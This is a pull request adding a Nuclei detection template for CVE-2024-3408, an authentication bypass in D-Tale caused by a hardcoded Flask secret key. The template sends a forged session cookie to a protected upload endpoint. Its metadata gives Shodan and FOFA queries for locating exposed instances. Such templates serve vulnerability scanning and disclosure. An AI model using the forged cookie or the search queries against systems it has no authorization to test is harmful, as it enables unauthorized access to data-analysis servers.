### PR TITLE
Add CVE-2024-3408 - D-Tale Authentication Bypass via Hardcoded Flask SECRET_KEY

### DIFF
--- a/http/cves/2024/CVE-2024-3408.yaml
+++ b/http/cves/2024/CVE-2024-3408.yaml
@@ -1,0 +1,80 @@
+id: CVE-2024-3408
+
+info:
+  name: D-Tale <3.10.0 - Authentication Bypass via Hardcoded Flask SECRET_KEY
+  author: DhiyaneshDK
+  severity: critical
+  description: |
+    D-Tale before version 3.10.0 uses a hardcoded Flask SECRET_KEY value 'Dtale'. An unauthenticated attacker can forge arbitrary Flask session cookies to bypass authentication and gain unauthorized access to the application. When combined with CVE-2025-0655, this vulnerability chain can lead to remote code execution.
+  impact: |
+    An unauthenticated attacker can forge valid session cookies to bypass authentication, access sensitive data analysis functionality, and potentially achieve remote code execution through additional vulnerabilities.
+  remediation: |
+    Upgrade D-Tale to version 3.10.0 or later where the SECRET_KEY is properly randomized.
+  reference:
+    - https://huntr.com/bounties/57a06666-ff85-4577-af19-f3dfb7b02f91
+    - https://github.com/man-group/dtale/issues/942
+    - https://nvd.nist.gov/vuln/detail/CVE-2024-3408
+    - https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/http/dtale_rce_cve_2025_0655.rb
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.8
+    cve-id: CVE-2024-3408
+    cwe-id: CWE-798
+    epss-score: 0.00045
+    epss-percentile: 0.17635
+    cpe: cpe:2.3:a:man-group:dtale:*:*:*:*:*:python:*:*
+  metadata:
+    verified: true
+    max-request: 2
+    vendor: man-group
+    product: dtale
+    shodan-query: title:"D-Tale"
+    fofa-query: title="D-Tale"
+  tags: cve,cve2024,dtale,auth-bypass,hardcoded-secret,flask,session-forgery
+
+flow: http(1) && http(2)
+
+http:
+  - raw:
+      - |
+        GET / HTTP/1.1
+        Host: {{Hostname}}
+
+    matchers:
+      - type: dsl
+        dsl:
+          - 'status_code == 200'
+          - 'contains_any(tolower(body), "d-tale", "dtale", "dtale_version")'
+        condition: and
+        internal: true
+
+  - raw:
+      - |
+        GET /dtale/popup/upload HTTP/1.1
+        Host: {{Hostname}}
+        Cookie: session=eyJsb2dnZWRfaW4iOnRydWUsInVzZXJuYW1lIjoibnVjbGVpIn0.aYDfJQ.-S9_xQkaic_sOEDNS9D43voWptM
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "D-Tale"
+          - "upload"
+        condition: and
+
+      - type: regex
+        part: body
+        regex:
+          - 'id="version"[^>]*value="[0-9.]+"'
+
+      - type: status
+        status:
+          - 200
+
+    extractors:
+      - type: regex
+        name: version
+        group: 1
+        regex:
+          - 'id="version"[^>]*value="([^"]+)"'


### PR DESCRIPTION
/claim #14488

## CVE-2024-3408 - D-Tale Authentication Bypass

### Description
D-Tale before version 3.10.0 uses a hardcoded Flask SECRET_KEY value 'Dtale'. An unauthenticated attacker can forge arbitrary Flask session cookies to bypass authentication.

### Vulnerability Details
- **CVE ID:** CVE-2024-3408
- **Severity:** Critical (CVSS 9.8)
- **CWE:** CWE-798 (Use of Hard-coded Credentials)
- **Affected Product:** D-Tale < 3.10.0

### References
- https://huntr.com/bounties/57a06666-ff85-4577-af19-f3dfb7b02f91
- https://nvd.nist.gov/vuln/detail/CVE-2024-3408
- https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/http/dtale_rce_cve_2025_0655.rb

### Technical Details
The template forges a Flask session cookie using the hardcoded SECRET_KEY 'Dtale' and checks if it grants access to protected endpoints like /dtale/popup/upload.

### Testing
Template validated with nuclei syntax checker.